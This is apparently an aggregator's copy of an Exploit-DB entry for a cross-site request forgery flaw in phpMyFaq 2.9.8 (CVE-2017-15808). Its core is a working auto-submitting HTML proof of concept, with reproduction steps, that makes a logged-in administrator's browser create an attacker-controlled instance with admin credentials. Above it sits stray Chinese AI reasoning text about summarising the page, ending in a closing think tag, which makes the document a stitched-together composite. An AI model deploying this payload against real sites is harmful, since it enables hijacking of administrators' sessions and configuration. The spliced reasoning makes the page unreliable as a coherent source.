[webapps] phpMyFaq 2.9.8 - Cross Site Request Forgery (CSRF)
嗯,用户让我总结一下这篇文章的内容,控制在一百个字以内,而且不需要用“文章内容总结”或者“这篇文章”这样的开头。首先,我需要仔细阅读用户提供的内容。 这篇文章看起来是一个安全漏洞的报告,标题是phpMyFaq 2.9.8的CSRF漏洞。作者是CodeSecLab,日期是2025年11月25日。漏洞的CVE编号是CVE-2017-15808。文章中还提供了一个PoC(概念验证)代码,是一个HTML表单,用来发起CSRF攻击。步骤包括保存代码为poc.html,在登录phpmyfaq后打开这个文件,结果就会发生。 我需要把重点放在漏洞的类型、影响和利用方式上。控制在100字以内,所以要简洁明了。不需要复杂的结构,直接描述即可。 可能的总结:phpMyFaq 2.9.8版本存在CSRF漏洞,攻击者可利用恶意HTML文件在用户浏览器中执行未授权操作,如添加恶意实例或更改配置。 检查一下字数是否符合要求,并且是否涵盖了关键点:漏洞名称、版本、攻击方式、影响。看起来没问题。 </think> phpMyFaq 2.9.8 存在跨站请求伪造(CSRF)漏洞,攻击者可通过恶意 HTML 文件在用户浏览器中执行未授权操作,如添加恶意实例或更改配置。 2025-12-3 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:1 收藏

# Exploit Title: phpMyFaq 2.9.8 - Cross Site Request Forgery (CSRF)
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ/
# Software Link: https://github.com/thorsten/phpMyFAQ/
# Version: 2.9.8
# Tested on: Windows 10
# CVE : CVE-2017-15808


PoC: 
<html>
  <body>
    <form action="http://phpmyfaq/admin/index.php" method="GET">
      <input type="hidden" name="action" value="ajax">
      <input type="hidden" name="ajax" value="config">
      <input type="hidden" name="ajaxaction" value="add_instance">
      <input type="hidden" name="url" value="malicious">
      <input type="hidden" name="instance" value="malicious_instance">
      <input type="hidden" name="comment" value="CSRF Test">
      <input type="hidden" name="email" value="[email protected]">
      <input type="hidden" name="admin" value="attacker">
      <input type="hidden" name="password" value="password123">
      <input type="submit" value="Submit request">
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Steps to Reproduce:
1. Save the following code as poc.html.
2. Log in phpmyfaq, and open the file in the same browser.
3. The outcome will occur.
            

文章来源: https://www.exploit-db.com/exploits/52455
如有侵权请联系:admin#unsafe.sh